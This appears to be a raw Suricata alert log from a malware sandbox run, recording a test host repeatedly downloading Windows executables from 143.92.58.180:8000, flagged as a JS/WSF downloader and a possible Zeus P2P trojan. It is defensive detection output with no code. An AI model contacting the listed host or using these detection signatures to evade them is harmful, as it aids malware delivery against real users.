TCP 192.168.56.103:49699 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49784 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49704 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49789 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49716 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49793 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49717 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49802 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49718 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49804 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49719 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49809 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49725 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49816 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49727 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49820 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49729 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49822 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49734 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49825 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49740 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49742 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49743 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49758 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49762 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49772 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49777 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49779 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49783 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49792 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49796 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49808 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49817 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49821 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49823 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49415 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2023679 ET MALWARE JS/WSF Downloader Dec 08 2016 M6 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2019103 ET MALWARE OneLouder EXE download possibly installing Zeus P2P A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
